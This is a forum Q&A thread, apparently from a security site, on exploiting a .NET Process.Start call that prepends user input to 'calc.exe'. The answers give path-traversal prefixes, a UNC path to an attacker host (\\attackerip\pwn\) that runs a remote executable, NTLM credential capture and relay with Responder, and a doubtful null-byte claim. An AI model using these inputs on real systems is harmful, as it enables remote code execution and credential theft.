# Process.Start() Command Injection

Tags: exploit, .net

How to exploit a program that has this line:

```
Process.Start(user_input + "calc.exe")
```

It's a .NET function and nothing has worked so far (`"mal.exe &&"`, `"mal.exe;"`, ...)
Any ideas?

Comment: Are you able to control the file name of mal.exe?

Comment: I control user_input, I can write whatever I want

Comment: Yes, but this mal.exe file you want to run, does it *have* to be named mal.exe or can it be any name you want?

Comment: I want a specific exe to run at the end

Comment: That doesn't answer nobody's question. Can this specific exe be named something different.

Comment: Then the answer is no.

Answer (score 2):

https://docs.microsoft.com/en-us/dotnet/api/system.diagnostics.process.start?view=net-5.0 `Process.Start` is more akin to, in terms of POSIX functions, `execvp` than to `system`—`Process.Start` doesn't launch a shell (where your `&&` tricks would work great), but rather directly invoke the given filename.

However, prepending a prefix to a filename can rewrite it to arbitrary places, because you can do something like:

- `../../../evilcalc.exe` (`user_input` is `../../../evil` (ascending ancestor directories from the current working directory)
- `C:\somewhere\evilcalc.exe` (`user_input` is `C:\somewhere\evil`) (Windows absolute file path)
- `/somewhere/evilcalc.exe` (`user_input` is `/somewhere/evil`) (Unix absolute file path)

I don't think you can run something that doesn't end in `calc.exe` though—your `mal.exe` needs to be named something else (although I do question how you got it there at all, yet can't select its name—is it a builtin OS service or already-installed application you want to inconveniently trigger?).

Answer (score 2):

As per @iridia's answer you need to control the prefix of the string. The easiest way to remotely exploit this is by using UNC (or potentially webdav) where you place a malicious file named calc.exe on a share and supply the path as userinput: `\\attackerip\pwn\` which will execute `\\attackerip\pwn\calc.exe`.

If you don't have a malicious executable available you could also use this trick to snarf NTLM credentials with something like responder - https://github.com/lgandx/Responder or use multirelay to replay them to another server for shell.

Answer (score 2):

The answer was adding a null byte `"mal.exe" + '\00'`.